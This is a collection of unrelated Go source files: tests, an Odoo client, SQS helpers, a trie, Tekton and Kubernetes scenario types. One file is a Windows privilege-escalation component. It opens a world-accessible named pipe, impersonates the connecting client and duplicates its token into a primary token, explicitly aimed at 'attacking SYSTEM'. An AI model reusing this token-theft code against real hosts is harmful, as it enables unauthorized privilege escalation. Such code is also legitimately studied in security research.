text stringlengths 11 4.05M |
|---|
package resourcemanager
import (
"coffeeMachine/src/entities"
"context"
"github.com/stretchr/testify/assert"
"sync"
"testing"
)
func TestNew(t *testing.T) {
tests := []struct {
name string
assert func(repository Repository)
}{
{
name: "success | get repository",
assert: func(repository Repository) {
assert.NotNil(t, repository)
assert.IsType(t, &repositoryImpl{}, repository)
concreteRepositoryImpl := repository.(*repositoryImpl)
assert.NotNil(t, concreteRepositoryImpl.availableResources)
assert.NotNil(t, concreteRepositoryImpl.mutex)
},
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got := New()
tt.assert(got)
})
}
}
func Test_managerImpl_GetIngredient(t *testing.T) {
ctx := context.Background()
type fields struct {
mutex map[string]*sync.RWMutex
availableResources map[string]int
}
type args struct {
ctx context.Context
getReq GetRequest
}
const (
_IngredientID = "Ingredient1234"
)
mutexes := make(map[string]*sync.RWMutex, 0)
tests := []struct {
name string
fields fields
args args
assert func(ingredient *entities.Ingredient, err error)
}{
{
name: "success | new ingredient",
args: args{
ctx: ctx,
getReq: GetRequest{
IngredientID: _IngredientID,
},
},
fields: fields{
availableResources: map[string]int{
_IngredientID: 5,
},
mutex: mutexes,
},
assert: func(ingredient *entities.Ingredient, err error) {
assert.NoError(t, err)
assert.NotNil(t, ingredient)
assert.Equal(t, _IngredientID, ingredient.ID)
},
},
{
name: "error | resource not found",
args: args{
ctx: ctx,
getReq: GetRequest{
IngredientID: _IngredientID,
},
},
fields: fields{
availableResources: make(map[string]int, 0),
mutex: mutexes,
},
assert: func(ingredient *entities.Ingredient, err error) {
assert.EqualError(t, err, entities.ErrResourceNotAvailable.Error())
assert.Nil(t, ingredient)
},
},
}
for _, testIdx := range tests {
tt := testIdx
m := &repositoryImpl{
mutex: tt.fields.mutex,
availableResources: tt.fields.availableResources,
}
t.Run(tt.name, func(t *testing.T) {
t.Parallel()
got, err := m.GetIngredient(tt.args.ctx, tt.args.getReq)
tt.assert(got, err)
})
}
}
func Test_managerImpl_UpdateIngredient(t *testing.T) {
ctx := context.Background()
type fields struct {
mutex map[string]*sync.RWMutex
availableResources map[string]int
}
type args struct {
ctx context.Context
updateReq UpdateRequest
}
const (
_IngredientID = "Ingredient1234"
)
mutexes := make(map[string]*sync.RWMutex, 0)
tests := []struct {
name string
fields fields
args args
assert func(repositoryImpl repositoryImpl, ingredient *entities.Ingredient, err error)
}{
{
name: "success | update-action = refill, new ingredient",
args: args{
ctx: ctx,
updateReq: UpdateRequest{
IngredientID: _IngredientID,
UpdateType: UpdateTypeRefill,
ResourceQuantity: 5,
},
},
fields: fields{
mutex: mutexes,
availableResources: map[string]int{},
},
assert: func(repositoryImpl repositoryImpl, ingredient *entities.Ingredient, err error) {
assert.NoError(t, err)
assert.NotNil(t, ingredient)
assert.Equal(t, 5, ingredient.Quantity)
},
},
{
name: "success | update-action = refill, ingredient already present with some quantity",
args: args{
ctx: ctx,
updateReq: UpdateRequest{
IngredientID: _IngredientID,
UpdateType: UpdateTypeRefill,
ResourceQuantity: 5,
},
},
fields: fields{
mutex: mutexes,
availableResources: map[string]int{
_IngredientID: 5,
},
},
assert: func(repositoryImpl repositoryImpl, ingredient *entities.Ingredient, err error) {
assert.NoError(t, err)
assert.NotNil(t, ingredient)
assert.Equal(t, 10, ingredient.Quantity)
},
},
{
name: "success | update-action = consume, ingredient not already present",
args: args{
ctx: ctx,
updateReq: UpdateRequest{
IngredientID: _IngredientID,
UpdateType: UpdateTypeConsume,
ResourceQuantity: 5,
},
},
fields: fields{
mutex: mutexes,
availableResources: map[string]int{},
},
assert: func(repositoryImpl repositoryImpl, ingredient *entities.Ingredient, err error) {
assert.EqualError(t, err, entities.ErrResourceNotAvailable.Error())
},
},
{
name: "success | update-action = consume, ingredient already present with some quantity",
args: args{
ctx: ctx,
updateReq: UpdateRequest{
IngredientID: _IngredientID,
UpdateType: UpdateTypeConsume,
ResourceQuantity: 5,
},
},
fields: fields{
mutex: mutexes,
availableResources: map[string]int{
_IngredientID: 10,
},
},
assert: func(repositoryImpl repositoryImpl, ingredient *entities.Ingredient, err error) {
assert.NoError(t, err)
assert.Equal(t, 5, ingredient.Quantity)
},
},
{
name: "success | update-action = consume, ingredient already present with same quantity, quantity becomes 0 after update",
args: args{
ctx: ctx,
updateReq: UpdateRequest{
IngredientID: _IngredientID,
UpdateType: UpdateTypeConsume,
ResourceQuantity: 5,
},
},
fields: fields{
mutex: mutexes,
availableResources: map[string]int{
_IngredientID: 5,
},
},
assert: func(repositoryImpl repositoryImpl, ingredient *entities.Ingredient, err error) {
assert.NoError(t, err)
assert.NotContains(t, repositoryImpl.availableResources, _IngredientID)
assert.NotContains(t, repositoryImpl.mutex, _IngredientID)
},
},
}
for _, testIdx := range tests {
tt := testIdx
m := repositoryImpl{
mutex: tt.fields.mutex,
availableResources: tt.fields.availableResources,
}
t.Run(tt.name, func(t *testing.T) {
t.Parallel()
got, err := m.UpdateIngredient(tt.args.ctx, tt.args.updateReq)
tt.assert(m, got, err)
})
}
}
|
/*
Copyright 2020 The Skaffold Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package manifest
import (
"fmt"
sErrors "github.com/GoogleContainerTools/skaffold/v2/pkg/skaffold/errors"
"github.com/GoogleContainerTools/skaffold/v2/proto/v1"
)
func replaceImageErr(err error) error {
return sErrors.NewError(err,
&proto.ActionableErr{
Message: fmt.Sprintf("replacing images in manifest: %s", err),
ErrCode: proto.StatusCode_RENDER_REPLACE_IMAGE_ERR,
})
}
func transformManifestErr(err error) error {
return sErrors.NewError(err,
&proto.ActionableErr{
Message: fmt.Sprintf("unable to transform manifests: %s", err),
ErrCode: proto.StatusCode_RENDER_TRANSFORM_MANIFEST_ERR,
})
}
func labelSettingErr(err error) error {
return sErrors.NewError(err,
&proto.ActionableErr{
Message: fmt.Sprintf("setting labels in manifests: %s", err),
ErrCode: proto.StatusCode_RENDER_SET_LABEL_ERR,
})
}
func parseImagesInManifestErr(err error) error {
if err == nil {
return err
}
return sErrors.NewError(err,
&proto.ActionableErr{
Message: fmt.Sprintf("parsing images in manifests: %s", err),
ErrCode: proto.StatusCode_RENDER_PARSE_MANIFEST_IMAGES_ERR,
})
}
func writeErr(err error) error {
return sErrors.NewError(err,
&proto.ActionableErr{
Message: err.Error(),
ErrCode: proto.StatusCode_RENDER_MANIFEST_WRITE_ERR,
})
}
func nsSettingErr(err error) error {
return sErrors.NewError(err,
&proto.ActionableErr{
Message: fmt.Sprintf("setting namespace in manifests: %s", err),
ErrCode: proto.StatusCode_RENDER_SET_NAMESPACE_ERR,
})
}
|
package odoo
import (
"fmt"
)
// FetchmailServer represents fetchmail.server model.
type FetchmailServer struct {
LastUpdate *Time `xmlrpc:"__last_update,omptempty"`
ActionId *Many2One `xmlrpc:"action_id,omptempty"`
Active *Bool `xmlrpc:"active,omptempty"`
Attach *Bool `xmlrpc:"attach,omptempty"`
Configuration *String `xmlrpc:"configuration,omptempty"`
CreateDate *Time `xmlrpc:"create_date,omptempty"`
CreateUid *Many2One `xmlrpc:"create_uid,omptempty"`
Date *Time `xmlrpc:"date,omptempty"`
DisplayName *String `xmlrpc:"display_name,omptempty"`
Id *Int `xmlrpc:"id,omptempty"`
IsSsl *Bool `xmlrpc:"is_ssl,omptempty"`
MessageIds *Relation `xmlrpc:"message_ids,omptempty"`
Name *String `xmlrpc:"name,omptempty"`
ObjectId *Many2One `xmlrpc:"object_id,omptempty"`
Original *Bool `xmlrpc:"original,omptempty"`
Password *String `xmlrpc:"password,omptempty"`
Port *Int `xmlrpc:"port,omptempty"`
Priority *Int `xmlrpc:"priority,omptempty"`
Script *String `xmlrpc:"script,omptempty"`
Server *String `xmlrpc:"server,omptempty"`
State *Selection `xmlrpc:"state,omptempty"`
Type *Selection `xmlrpc:"type,omptempty"`
User *String `xmlrpc:"user,omptempty"`
WriteDate *Time `xmlrpc:"write_date,omptempty"`
WriteUid *Many2One `xmlrpc:"write_uid,omptempty"`
}
// FetchmailServers represents array of fetchmail.server model.
type FetchmailServers []FetchmailServer
// FetchmailServerModel is the odoo model name.
const FetchmailServerModel = "fetchmail.server"
// Many2One convert FetchmailServer to *Many2One.
func (fs *FetchmailServer) Many2One() *Many2One {
return NewMany2One(fs.Id.Get(), "")
}
// CreateFetchmailServer creates a new fetchmail.server model and returns its id.
func (c *Client) CreateFetchmailServer(fs *FetchmailServer) (int64, error) {
ids, err := c.CreateFetchmailServers([]*FetchmailServer{fs})
if err != nil {
return -1, err
}
if len(ids) == 0 {
return -1, nil
}
return ids[0], nil
}
// CreateFetchmailServer creates a new fetchmail.server model and returns its id.
func (c *Client) CreateFetchmailServers(fss []*FetchmailServer) ([]int64, error) {
var vv []interface{}
for _, v := range fss {
vv = append(vv, v)
}
return c.Create(FetchmailServerModel, vv)
}
// UpdateFetchmailServer updates an existing fetchmail.server record.
func (c *Client) UpdateFetchmailServer(fs *FetchmailServer) error {
return c.UpdateFetchmailServers([]int64{fs.Id.Get()}, fs)
}
// UpdateFetchmailServers updates existing fetchmail.server records.
// All records (represented by ids) will be updated by fs values.
func (c *Client) UpdateFetchmailServers(ids []int64, fs *FetchmailServer) error {
return c.Update(FetchmailServerModel, ids, fs)
}
// DeleteFetchmailServer deletes an existing fetchmail.server record.
func (c *Client) DeleteFetchmailServer(id int64) error {
return c.DeleteFetchmailServers([]int64{id})
}
// DeleteFetchmailServers deletes existing fetchmail.server records.
func (c *Client) DeleteFetchmailServers(ids []int64) error {
return c.Delete(FetchmailServerModel, ids)
}
// GetFetchmailServer gets fetchmail.server existing record.
func (c *Client) GetFetchmailServer(id int64) (*FetchmailServer, error) {
fss, err := c.GetFetchmailServers([]int64{id})
if err != nil {
return nil, err
}
if fss != nil && len(*fss) > 0 {
return &((*fss)[0]), nil
}
return nil, fmt.Errorf("id %v of fetchmail.server not found", id)
}
// GetFetchmailServers gets fetchmail.server existing records.
func (c *Client) GetFetchmailServers(ids []int64) (*FetchmailServers, error) {
fss := &FetchmailServers{}
if err := c.Read(FetchmailServerModel, ids, nil, fss); err != nil {
return nil, err
}
return fss, nil
}
// FindFetchmailServer finds fetchmail.server record by querying it with criteria.
func (c *Client) FindFetchmailServer(criteria *Criteria) (*FetchmailServer, error) {
fss := &FetchmailServers{}
if err := c.SearchRead(FetchmailServerModel, criteria, NewOptions().Limit(1), fss); err != nil {
return nil, err
}
if fss != nil && len(*fss) > 0 {
return &((*fss)[0]), nil
}
return nil, fmt.Errorf("fetchmail.server was not found with criteria %v", criteria)
}
// FindFetchmailServers finds fetchmail.server records by querying it
// and filtering it with criteria and options.
func (c *Client) FindFetchmailServers(criteria *Criteria, options *Options) (*FetchmailServers, error) {
fss := &FetchmailServers{}
if err := c.SearchRead(FetchmailServerModel, criteria, options, fss); err != nil {
return nil, err
}
return fss, nil
}
// FindFetchmailServerIds finds records ids by querying it
// and filtering it with criteria and options.
func (c *Client) FindFetchmailServerIds(criteria *Criteria, options *Options) ([]int64, error) {
ids, err := c.Search(FetchmailServerModel, criteria, options)
if err != nil {
return []int64{}, err
}
return ids, nil
}
// FindFetchmailServerId finds record id by querying it with criteria.
func (c *Client) FindFetchmailServerId(criteria *Criteria, options *Options) (int64, error) {
ids, err := c.Search(FetchmailServerModel, criteria, options)
if err != nil {
return -1, err
}
if len(ids) > 0 {
return ids[0], nil
}
return -1, fmt.Errorf("fetchmail.server was not found with criteria %v and options %v", criteria, options)
}
|
package sqs
import (
"fmt"
"strings"
"github.com/xidongc/qproxy/rpc"
)
const sepChar = "_"
const forwardSlash = "/"
func QueueIdToName(id *rpc.QueueId) *string {
url := strings.Join([]string{id.Namespace, id.Name}, sepChar)
return &url
}
func QueueUrlToQueueId(url string) (*rpc.QueueId, error) {
// Example url: https://sqs.us-east-2.amazonaws.com/123456789012/MyQueue
tokens := strings.Split(url, forwardSlash)
name := tokens[len(tokens)-1]
name_tokens := strings.SplitN(name, sepChar, 2)
if len(name_tokens) != 2 {
return nil, fmt.Errorf("Malformed queue name %v", name)
}
return &rpc.QueueId{
Namespace: name_tokens[0],
Name: name_tokens[1],
}, nil
}
|
package main
//Invalid
//Checks if length of expression list in LHS and RHS is equal
func f() {
var a1, a2 int ;
a1, a2 = 3, 4, 5
} |
package lc208
import (
"strings"
)
type Trie struct {
Value string
Son *map[string]*Trie
End bool // 是否是个单词
}
/** Initialize your data structure here. */
func Constructor() Trie {
return Trie{Value: "*", Son: &map[string]*Trie{}}
}
/** Inserts a word into the trie. */
func (this *Trie) Insert(word string) {
Son := this.Son
wordArr := strings.Split(word, "")
index := 0
var trie Trie
for {
if index == len(wordArr) {
trie.End = true
break
}
if (*Son)[wordArr[index]] != nil {
trie = *((*Son)[wordArr[index]])
Son = (*Son)[wordArr[index]].Son
index++
} else {
trie = Trie{Value: wordArr[index], Son: &map[string]*Trie{}}
(*Son)[wordArr[index]] = &trie
Son = (*Son)[wordArr[index]].Son
index++
}
}
return
}
// Search Returns if the word is in the trie
func (this *Trie) Search(word string) bool {
index := 0
wordArr := strings.Split(word, "")
length := len(wordArr)
next := "*"
Son := this.Son
for {
if (*Son)[wordArr[index]] != nil {
next = (*Son)[wordArr[index]].Value
Son = (*Son)[wordArr[index]].Son
index++
} else {
next = ""
}
if next == "" {
return false
}
if index == length && (*Son)[wordArr[index]].End {
return (*Son)[wordArr[index]].End
}
}
}
/** Returns if there is any word in the trie that starts with the given prefix. */
func (this *Trie) StartsWith(prefix string) bool {
return this.Search(prefix)
}
/**
* Your Trie object will be instantiated and called as such:
* obj := Constructor();
* obj.Insert(word);
* param_2 := obj.Search(word);
* param_3 := obj.StartsWith(prefix);
*/
|
package main
import (
"fmt"
"syscall"
"unsafe"
"golang.org/x/sys/windows"
)
type NamedPipeNegotiator struct {
Name string
}
func (negotiator NamedPipeNegotiator) Serve() NegotiatorResult {
var sd windows.SECURITY_DESCRIPTOR
pipeName := "\\\\.\\pipe\\" + negotiator.Name
_, _, err := initializeSecurityDescriptor.Call(uintptr(unsafe.Pointer(&sd)), 1)
if err == syscall.Errno(0) {
_, _, err = setSecurityDescriptorDacl.Call(uintptr(unsafe.Pointer(&sd)), 1, 0, 0)
if err != syscall.Errno(0) {
fmt.Println("[!] Couldn't allow everyone to read pipe - if you are attacking SYSTEM this is fine")
} else {
fmt.Println("[+] Set DACL to allow anyone to access")
}
}
sa := windows.SecurityAttributes{
Length: 40,
SecurityDescriptor: &sd,
InheritHandle: 0,
}
pipeHandle, err := windows.CreateNamedPipe(windows.StringToUTF16Ptr(pipeName), windows.PIPE_ACCESS_DUPLEX, windows.PIPE_TYPE_BYTE|windows.PIPE_WAIT|windows.PIPE_REJECT_REMOTE_CLIENTS, 10, 2048, 2048, 0, &sa)
if err != nil {
fmt.Println("[!] Failed to create pipe "+pipeName+": ", windows.GetLastError())
return NegotiatorResult{nil, err}
}
fmt.Println("[+] Created pipe at " + pipeName)
err = windows.ConnectNamedPipe(pipeHandle, nil)
if err != nil {
fmt.Println("[!] Failed to connect to pipe "+pipeName+": ", windows.GetLastError())
windows.CloseHandle(pipeHandle)
return NegotiatorResult{nil, err}
}
fmt.Println("[+] Connection established, duplicating client token")
buf := []byte{0}
_, err = windows.Read(pipeHandle, buf)
if err != nil {
fmt.Println("[!] Failed to read from pipe")
return NegotiatorResult{nil, err}
}
_, _, err = impersonateNamedPipeClient.Call(uintptr(pipeHandle))
if err != syscall.Errno(0) {
fmt.Println("[!] Call to ImpersonateNamedPipeClient failed")
return NegotiatorResult{nil, err}
}
threadHandle, err := windows.GetCurrentThread()
if err != nil {
fmt.Println("[!] Failed to get current thread")
return NegotiatorResult{nil, err}
}
var threadToken windows.Token
err = windows.OpenThreadToken(threadHandle, windows.TOKEN_ALL_ACCESS, false, &threadToken)
if err != nil {
fmt.Println("[!] Failed to open thread token")
return NegotiatorResult{nil, err}
}
var systemToken windows.Token
err = windows.DuplicateTokenEx(threadToken, windows.MAXIMUM_ALLOWED, nil, SecurityImpersonation, windows.TokenPrimary, &systemToken)
if err != nil {
fmt.Println("[!] Failed to duplicate client token")
return NegotiatorResult{nil, err}
}
windows.RevertToSelf()
windows.CloseHandle(pipeHandle)
return NegotiatorResult{&systemToken, nil}
}
func (negotiator NamedPipeNegotiator) Trigger() bool {
return true
}
|
package pipelinetotaskrun
import (
"fmt"
"github.com/tektoncd/pipeline/pkg/apis/pipeline/v1alpha1"
"github.com/tektoncd/pipeline/pkg/apis/pipeline/v1beta1"
)
func getMergedTaskRun(run *v1alpha1.Run, pSpec *v1beta1.PipelineSpec, taskSpecs map[string]*v1beta1.TaskSpec) (*v1beta1.TaskRun, error) {
sequence, err := putTasksInOrder(pSpec.Tasks)
if err != nil {
return nil, fmt.Errorf("couldn't find valid order for tasks: %v", err)
}
// we'll be declaring and mapping one workspace per provided workspace and eliminating the indirection added by the
// workspaces declared by the Task. This will make sure that is volume claim templates are used, only one volume
// will be created for each.
newWorkspaceMapping := getNewWorkspaceMapping(sequence)
// replace all param values with pipeline level params so we can ignore them from now on
sequenceWithAppliedParams := applyPipelineLevelParams(sequence, run.Spec.Params)
tr := &v1beta1.TaskRun{
ObjectMeta: getObjectMeta(run),
Spec: v1beta1.TaskRunSpec{
ServiceAccountName: run.Spec.ServiceAccountName,
TaskSpec: &v1beta1.TaskSpec{},
Workspaces: run.Spec.Workspaces,
},
}
for _, w := range pSpec.Workspaces {
// mapping only the supported workspace declaration fields
tr.Spec.TaskSpec.Workspaces = append(tr.Spec.TaskSpec.Workspaces, v1beta1.WorkspaceDeclaration{
Name: w.Name,
Description: w.Description,
})
}
// if an optional workspace isn't provided, we don't need to remap it but we still need to declare it
// in order for any variable interpolation to work
optionalWS, err := getUnboundOptionalWorkspaces(taskSpecs, newWorkspaceMapping)
if err != nil {
return nil, fmt.Errorf("invalid workspace binding for %s wasn't caught by validation: %v", run.Name, err)
}
for _, ws := range optionalWS {
tr.Spec.TaskSpec.Workspaces = append(tr.Spec.TaskSpec.Workspaces, v1beta1.WorkspaceDeclaration{
Name: ws.Name,
Description: ws.Description,
Optional: ws.Optional,
})
}
for _, pTask := range sequenceWithAppliedParams {
pti, err := NewPipelineTaskInfo(pTask, taskSpecs)
if err != nil {
return nil, fmt.Errorf("couldn't construct object to hold pipeline task info for %s: %v", pTask.Name, err)
}
pti = pti.NamespaceParams()
pti = pti.NamespaceSteps()
pti = pti.RenameWorkspaces(newWorkspaceMapping[pTask.Name])
tr.Spec.Params = append(tr.Spec.Params, pti.ProvidedParamValues...)
tr.Spec.TaskSpec.Params = append(tr.Spec.TaskSpec.Params, pti.TaskDeclaredParams...)
tr.Spec.TaskSpec.Steps = append(tr.Spec.TaskSpec.Steps, pti.Steps...)
// we don't support mapping results but we need to declare them in order for steps that write
// results to be able to write to the dirs they expect
tr.Spec.TaskSpec.Results = append(tr.Spec.TaskSpec.Results, pti.Results...)
}
return tr, nil
}
|
package config
import (
"bufio"
"os"
)
func ReadLineFile(fileName string) []string{
res := make([]string,0)
if file, err := os.Open(fileName);err !=nil{
panic(err)
}else {
scanner := bufio.NewScanner(file)
for scanner.Scan(){
res = append(res,scanner.Text())
}
}
return res
}
|
package network
import (
"github.com/johnnyeven/terra/dht"
"reflect"
)
type PeerManager struct {
peers *dht.SyncedMap
}
func NewPeerManager() *PeerManager {
return &PeerManager{
peers: dht.NewSyncedMap(),
}
}
func (pm *PeerManager) Get(peerID []byte) (*Peer, bool) {
val, ok := pm.peers.Get(string(peerID))
return val.(*Peer), ok
}
func (pm *PeerManager) Has(peerID []byte) bool {
return pm.peers.Has(string(peerID))
}
func (pm *PeerManager) Set(val *Peer) {
pm.peers.Set(string(val.Guid), val)
}
func (pm *PeerManager) Delete(peerID []byte) {
pm.peers.Delete(string(peerID))
}
func (pm *PeerManager) DeleteMulti(peerIDs [][]byte) {
interfaces := make([]interface{}, 0)
for _, peerID := range peerIDs {
v := reflect.ValueOf(string(peerID))
interfaces = append(interfaces, v.Interface())
}
pm.peers.DeleteMulti(interfaces)
}
func (pm *PeerManager) Clear() {
pm.peers.Clear()
}
func (pm *PeerManager) Iterator(iterator func(peer *Peer) error, errorContinue bool) {
ch := pm.peers.Iter()
for item := range ch {
p := item.Value.(*Peer)
err := iterator(p)
if err != nil {
if errorContinue {
continue
} else {
break
}
}
}
}
func (pm *PeerManager) Len() int {
return pm.peers.Len()
}
|
/*
Copyright 2021-2023 ICS-FORTH.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package v1alpha1
import (
"fmt"
"sort"
"strings"
"time"
v1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/meta"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/util/json"
)
// +kubebuilder:object:root=true
// +kubebuilder:subresource:status
// Scenario is the Schema for the Scenarios API.
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type Scenario struct {
metav1.TypeMeta `json:",inline"`
metav1.ObjectMeta `json:"metadata,omitempty"`
Spec ScenarioSpec `json:"spec,omitempty"`
Status ScenarioStatus `json:"status,omitempty"`
}
func (in *Scenario) Table() (header []string, data [][]string) {
header = []string{
"Test",
"Scenario",
"Age",
"Actions",
"Phase",
"Duration",
}
var scheduled string
if in.Spec.Suspend != nil && *in.Spec.Suspend {
scheduled = fmt.Sprintf("%d/%d (Suspended)", len(in.Status.ScheduledJobs), len(in.Spec.Actions))
} else {
scheduled = fmt.Sprintf("%d/%d", len(in.Status.ScheduledJobs), len(in.Spec.Actions))
}
// age is the elapsed time since the test was created
age := time.Since(in.GetCreationTimestamp().Time)
if age < 0 {
scenariolog.Info("Time skew between Kubernetes Server and Controller.")
}
// duration is the elapsed time until the test was completed (either succeeded or failed).
// if the test is not yet completed, it is equal to the age.
duration := age
if meta.IsStatusConditionTrue(in.Status.Conditions, ConditionAllJobsAreCompleted.String()) {
cond := meta.FindStatusCondition(in.Status.Conditions, ConditionAllJobsAreCompleted.String())
duration = cond.LastTransitionTime.Sub(in.GetCreationTimestamp().Time)
}
if meta.IsStatusConditionTrue(in.Status.Conditions, ConditionJobUnexpectedTermination.String()) {
cond := meta.FindStatusCondition(in.Status.Conditions, ConditionJobUnexpectedTermination.String())
duration = cond.LastTransitionTime.Sub(in.GetCreationTimestamp().Time)
}
if meta.IsStatusConditionTrue(in.Status.Conditions, ConditionAssertionError.String()) {
cond := meta.FindStatusCondition(in.Status.Conditions, ConditionAssertionError.String())
duration = cond.LastTransitionTime.Sub(in.GetCreationTimestamp().Time)
}
data = append(data, []string{
in.GetNamespace(),
in.GetName(),
age.Round(time.Second).String(),
scheduled,
in.Status.Phase.String(),
duration.Round(time.Second).String(),
})
return header, data
}
type ActionType string
const (
// ActionService creates a new service.
ActionService ActionType = "Service"
// ActionCluster creates multiple services running in a shared context.
ActionCluster ActionType = "Cluster"
// ActionChaos injects failures into the running system.
ActionChaos ActionType = "Chaos"
// ActionCascade injects multiple failures into the running system.
ActionCascade ActionType = "Cascade"
// ActionDelete deletes a created Frisbee resource (i.e services, clusters,).
ActionDelete ActionType = "Delete"
// ActionCall starts a remote process execution, from the controller to the targeted services.
ActionCall ActionType = "Call"
)
// Action is a step in a workflow that defines a particular part of a testing process.
type Action struct {
// ActionType refers to a category of actions that can be associated with a specific controller.
// +kubebuilder:validation:Enum=Service;Cluster;Chaos;Cascade;Delete;Call
ActionType ActionType `json:"action"`
// Name is a unique identifier of the action
Name string `json:"name"`
// DependsOn defines the conditions for the execution of this action
// +optional
DependsOn *WaitSpec `json:"depends,omitempty"`
// Assert defines the conditions that must be maintained after the action has been started.
// If the evaluation of the condition is false, the Scenario will abort immediately.
// +optional
Assert *ConditionalExpr `json:"assert,omitempty"`
*EmbedActions `json:",inline"`
}
type WaitSpec struct {
// Running waits for the given groups to be running
// +optional
Running []string `json:"running,omitempty"`
// Success waits for the given groups to be succeeded
// +optional
Success []string `json:"success,omitempty"`
// After is the time offset since the beginning of this action.
// +optional
After *metav1.Duration `json:"after,omitempty"`
}
type DeleteSpec struct {
// Jobs is a list of jobs to be deleted. The format is {"kind":"name"}, e.g, {"service","client"}
Jobs []string `json:"jobs"`
}
type EmbedActions struct {
// +optional
Service *GenerateObjectFromTemplate `json:"service,omitempty"`
// +optional
Cluster *ClusterSpec `json:"cluster,omitempty"`
// +optional
Chaos *GenerateObjectFromTemplate `json:"chaos,omitempty"`
// +optional
Cascade *CascadeSpec `json:"cascade,omitempty"`
// +optional
Delete *DeleteSpec `json:"delete,omitempty"`
// +optional
Call *CallSpec `json:"call,omitempty"`
}
type TestdataVolume struct {
Claim v1.PersistentVolumeClaimVolumeSource `json:"volume,omitempty"`
// GlobalNamespace if disabled, all containers see the name root directory. If enabled, each container
// sees its own namespace.
// +optional
GlobalNamespace bool `json:"globalNamespace,omitempty"`
}
// ScenarioSpec defines the desired state of Scenario.
type ScenarioSpec struct {
// TestData defines a volume that will be mounted across the Scenario's Services.
TestData *TestdataVolume `json:"testData,omitempty"`
// Actions are the tasks that will be taken.
Actions []Action `json:"actions"`
// Suspend flag tells the controller to suspend subsequent executions, it does
// not apply to already started executions. Defaults to false.
// +optional
Suspend *bool `json:"suspend,omitempty"`
}
// ScenarioStatus defines the observed state of Scenario.
type ScenarioStatus struct {
Lifecycle `json:",inline"`
// ScheduledJobs is a list of references to the names of executed actions.
// +optional
ScheduledJobs []string `json:"scheduledJobs,omitempty"`
// GrafanaEndpoint points to the local Grafana instance
GrafanaEndpoint string `json:"grafanaEndpoint,omitempty"`
// PrometheusEndpoint points to the local Prometheus instance
PrometheusEndpoint string `json:"prometheusEndpoint,omitempty"`
// Dataviewer points to the local Dataviewer instance
DataviewerEndpoint string `json:"dataviewerEndpoint,omitempty"`
}
func (in *ScenarioStatus) Table() (header []string, data [][]string) {
header = []string{
"Phase",
"Reason",
"Message",
"Conditions",
}
// encode message to escape it
message, _ := json.Marshal(in.Message)
// encode conditions for better visualization
var conditions strings.Builder
{
if len(in.Conditions) > 0 {
for _, condition := range in.Conditions {
if condition.Status == metav1.ConditionTrue {
conditions.WriteString(condition.Type)
}
}
} else {
conditions.WriteString("\t----")
}
}
data = append(data, []string{
in.Phase.String(),
in.Reason,
string(message),
conditions.String(),
})
return header, data
}
func (in *Scenario) GetReconcileStatus() Lifecycle {
return in.Status.Lifecycle
}
func (in *Scenario) SetReconcileStatus(lifecycle Lifecycle) {
in.Status.Lifecycle = lifecycle
}
// +kubebuilder:object:root=true
// ScenarioList contains a list of Scenario.
type ScenarioList struct {
metav1.TypeMeta `json:",inline"`
metav1.ListMeta `json:"metadata,omitempty"`
Items []Scenario `json:"items"`
}
func (in *ScenarioList) TestNames() []string {
testNames := make([]string, len(in.Items))
for i, scenario := range in.Items {
testNames[i] = scenario.GetNamespace()
}
return testNames
}
// Table returns a tabular form of the structure for pretty printing.
func (in *ScenarioList) Table() (header []string, data [][]string) {
header = []string{
"Test",
"Scenario",
"Age",
"Actions",
"Phase",
"Duration",
}
// arrange in descending order (latest created goes first)
sort.SliceStable(in.Items, func(i, j int) bool {
tsI := in.Items[i].GetCreationTimestamp()
tsJ := in.Items[j].GetCreationTimestamp()
return tsI.After(tsJ.Time)
})
for _, scenario := range in.Items {
_, scenarioData := scenario.Table()
data = append(data, scenarioData...)
}
return header, data
}
func init() {
SchemeBuilder.Register(&Scenario{}, &ScenarioList{})
}
|
package script
import (
"bytes"
"testing"
)
var s = Script([]command{
OP_1,
OP_2,
OP_2DUP,
OP_EQUAL,
OP_NOT,
OP_VERIFY,
OP_SHA1,
OP_SWAP,
OP_SHA1,
OP_EQUAL,
})
func TestScriptMarshal(t *testing.T) {
buf, _ := s.Marshal()
if !bytes.Equal(buf, []byte{10, 81, 82, 110, 135, 145, 105, 167, 124, 167, 135}) {
t.Errorf("FAIL")
}
}
func TestScriptUnmarshal(t *testing.T) {
buf, _ := s.Marshal()
newS := *new(Script).Unmarshal(bytes.NewReader(buf))
for i := range s {
if !s[i].Equal(newS[i]) {
t.Errorf("FAIL")
}
}
}
|
package main
import (
"binary_tree/tree"
"flag"
"fmt"
"math/rand"
"os"
"time"
)
func main() {
graphViz := flag.Bool("g", false, "GraphViz dot output on stdout")
n := flag.Int("n", 5, "number of nodes in random tree")
nonrandvals := flag.Bool("r", false, "use sequential node values")
flag.Parse()
rand.Seed(time.Now().UnixNano() + int64(os.Getpid()))
root := generateRandom(*n, *nonrandvals)
if *graphViz {
tree.Draw(root)
return
}
tree.Print(root)
fmt.Println()
}
func generateRandom(n int, nonrandvals bool) tree.Node {
ary := make([]int, n)
if nonrandvals {
for i := 0; i < n; i++ {
ary[i] = i
}
} else {
for i := 0; i < n; i++ {
ary[i] = int(rand.Intn(n))
}
}
return something(ary)
}
func something(ary []int) *tree.NumericNode {
if len(ary) == 0 {
return nil
}
if len(ary) == 1 {
return &tree.NumericNode{Data: ary[0]}
}
div := rand.Intn(len(ary))
if div >= len(ary) {
div--
}
return &tree.NumericNode{
Data: ary[div],
Left: something(ary[:div]),
Right: something(ary[div+1:]),
}
}
|
package main
import (
"github.com/kelseyhightower/envconfig"
)
// Specification are env variables used by ems
// split_words is used by envconfig
